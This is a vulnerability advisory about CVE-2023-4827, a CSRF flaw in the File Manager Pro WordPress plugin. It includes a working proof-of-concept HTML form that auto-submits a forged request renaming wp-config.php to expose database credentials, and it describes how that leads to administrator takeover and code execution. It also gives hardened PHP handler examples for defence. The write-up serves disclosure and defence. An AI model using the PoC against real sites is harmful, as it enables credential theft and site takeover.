During testing of the plugin, a CSRF vulnerability was discovered in action=rename. It can lead to denial of service and to theft of the database password, which allows an attacker to get inside the web application and gain a foothold in it: replace any data in the database and do everything that an administrator can do. After logging into the database, the attacker can create a new user and attach a hashed password to it, and then, through that administrator account, achieve remote code execution (RCE).

Main info:

CVE: CVE-2023-4827
Plugin: File Manager Pro
Critical: Very High
Publicly Published: September 12, 2023
Last Updated: September 12, 2023
Researcher: Dmitrii Ignatyev
OWASP TOP-10: A2: Broken Authentication and Session Management
PoC: Yes
Exploit: Will be later
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4827
https://wpscan.com/vulnerability/d4daf0e1-8018-448a-964c-427a355e005f
Plugin Security Certification by CleanTalk

Timeline

August 25, 2023: Plugin testing and vulnerability detection in the File Manager Pro access plugin have been completed
August 25, 2023: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
September 8, 2023: The author has released a fix update
September 8, 2023: Registered CVE-2023-4827

Discovery of the Vulnerability

In the ever-evolving landscape of web security, the discovery of vulnerabilities is a critical aspect of keeping online systems safe. Recently, a noteworthy vulnerability, identified as CVE-2023-4827, was uncovered in File Manager Pro, specifically in versions prior to 1.8. This vulnerability poses a significant risk to web applications utilizing this plugin.

The vulnerability was first identified during a routine security assessment of the File Manager Pro plugin. It was categorized as a Cross-Site Request Forgery (CSRF) vulnerability, which, when exploited, could lead to remote code execution (RCE) on the affected web application.

Understanding CSRF attacks

Before delving into the specifics of this vulnerability, it’s crucial to understand what CSRF is and how it operates. CSRF, or Cross-Site Request Forgery, is a type of attack where an attacker tricks a user into executing actions on a web application without their consent. Essentially, it involves the exploitation of a user’s authenticated session to perform actions without their knowledge.

To illustrate this, imagine a scenario where an authenticated user is tricked into clicking a seemingly innocent link on a malicious website. This link sends a request to a target web application where the user is logged in, executing actions as if they initiated them themselves.

Exploiting the CSRF

In the case of CVE-2023-4827, the vulnerability was discovered in the “action=rename” feature of File Manager Pro. This vulnerability allows an attacker to craft a malicious CSRF request that forces an authenticated user to rename a file. While this may seem relatively benign at first glance, it has the potential for devastating consequences.

By exploiting this CSRF vulnerability, an attacker can initiate a series of actions leading to a remote code execution (RCE) scenario. They can gain control over the web application, potentially extracting sensitive information from the database, altering data, or even creating new users with hashed passwords. The attacker can effectively assume the privileges of an administrator and manipulate the application as they see fit.

POC html code:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/wordpress/wp-admin/admin-ajax.php">
      <input type="hidden" name="action" value="fs&#95;connector" />
      <input type="hidden" name="cmd" value="rename" />
      <input type="hidden" name="name" value="wp&#45;config&#46;txt" />
      <input type="hidden" name="target" value="l1&#95;d3AtY29uZmlnLnBocA" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Potential Risks and Real-World Impact

The potential risks associated with this vulnerability are significant. In a real-world scenario, an attacker could use CSRF to exploit File Manager Pro, gain access to a web application’s database, and compromise its security. They could then exfiltrate sensitive data, modify critical settings, or inject malicious code, potentially causing data breaches or service disruptions. Moreover, the attacker could establish persistent access, allowing them to maintain control over the application, leading to long-term security concerns.

Recommendations for Improved Security

To mitigate the risk associated with CVE-2023-4827 and similar CSRF vulnerabilities, several security measures should be considered:

  1. Update and Patch: It is crucial to keep all software, including plugins and themes, up to date. Developers often release patches to address security vulnerabilities.
  2. CSRF Protection: Implement robust CSRF protection mechanisms, such as anti-CSRF tokens, to ensure that requests are only executed when initiated by legitimate users.
  3. Security Audits: Regular security audits and penetration testing can help identify and address vulnerabilities before they can be exploited.
  4. Least Privilege Principle: Restrict user privileges to the minimum required for their tasks to limit potential damage in the event of a breach.
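The following is an added example illustrating recommendations 2 and 4, not code from File Manager Pro or from CleanTalk. It shows a hypothetical admin-ajax "rename" handler in the unprotected shape that a cross-site form post can drive (note that the PoC form above has no method attribute, so it submits via GET, and admin-ajax.php serves GET as well as POST), followed by the same handler hardened with a WordPress nonce and a capability check. All names prefixed with "example_" are assumptions for illustration; check_ajax_referer(), current_user_can(), wp_create_nonce(), wp_localize_script() and the other WordPress functions used are real core APIs.

```php
<?php
/**
 * Added example (not File Manager Pro's code): a hypothetical admin-ajax
 * "rename" handler, first in a CSRF-exposed shape, then hardened with a
 * WordPress nonce and a capability check. Names beginning with "example_"
 * are assumptions made for this illustration.
 */

// --- Exposed pattern (hypothetical): the handler trusts the browser's
// logged-in cookie alone, so a form auto-submitted from a third-party page
// is indistinguishable from a click inside the real file manager UI.
add_action( 'wp_ajax_example_rename_unsafe', 'example_rename_unsafe' );
function example_rename_unsafe() {
    $dir = wp_upload_dir()['basedir'];
    $old = $dir . '/' . basename( wp_unslash( $_REQUEST['target'] ?? '' ) );
    $new = $dir . '/' . basename( wp_unslash( $_REQUEST['name'] ?? '' ) );
    rename( $old, $new ); // no nonce, no capability check, GET accepted
    wp_send_json_success();
}

// --- Hardened pattern: the nonce ties the request to a page this site
// served to the logged-in user; the capability check enforces least
// privilege so a low-privileged account cannot reach the rename at all.
add_action( 'wp_ajax_example_rename', 'example_rename' );
function example_rename() {
    // check_ajax_referer() ends the request with "-1" and HTTP 403 when the
    // "nonce" field is missing or invalid. A nonce is only ever embedded in
    // pages rendered for the user, so a cross-site form cannot supply one.
    check_ajax_referer( 'example_rename_nonce', 'nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    $dir = wp_upload_dir()['basedir'];
    $old = $dir . '/' . sanitize_file_name( wp_unslash( $_POST['target'] ?? '' ) );
    $new = $dir . '/' . sanitize_file_name( wp_unslash( $_POST['name'] ?? '' ) );

    // Keep the operation inside the intended directory: realpath() resolves
    // symlinks and "..", then the result is checked against the base path.
    $real_old = realpath( $old );
    $base     = realpath( $dir ) . DIRECTORY_SEPARATOR;
    if ( false === $real_old || 0 !== strpos( $real_old, $base ) ) {
        wp_send_json_error( 'invalid target', 400 );
    }
    if ( ! rename( $real_old, $new ) ) {
        wp_send_json_error( 'rename failed', 500 );
    }
    wp_send_json_success( array( 'renamed' => basename( $new ) ) );
}

// --- Issuing the nonce: generated server-side for the current user and
// handed to the plugin's own script, which sends it back as the "nonce"
// POST field with every rename request.
add_action( 'admin_enqueue_scripts', 'example_enqueue' );
function example_enqueue() {
    wp_enqueue_script(
        'example-fm',
        plugins_url( 'example-fm.js', __FILE__ ), // hypothetical script
        array( 'jquery' ),
        '1.0',
        true
    );
    wp_localize_script( 'example-fm', 'exampleFm', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'example_rename_nonce' ),
    ) );
}
```

The nonce is the control that closes the CSRF hole described in this post: a forged request carries the victim's session cookie automatically, but it cannot carry a value that only exists inside pages the site rendered for that victim. The capability check is independent of it and limits the blast radius if any other authenticated path is ever reached, and the realpath() comparison keeps a rename from touching files outside the directory the file manager is meant to manage.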

In conclusion, CVE-2023-4827 serves as a stark reminder of the importance of maintaining vigilance in the ever-evolving landscape of cybersecurity. By understanding CSRF and taking proactive steps to secure web applications, developers and administrators can minimize the risks associated with such vulnerabilities and protect their systems from potential exploitation.

#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #VeryHighVulnerability


Dmitrii i.

CVE-2023-4827 – File Manager Pro < 1.8 - Remote Code Execution via CSRF
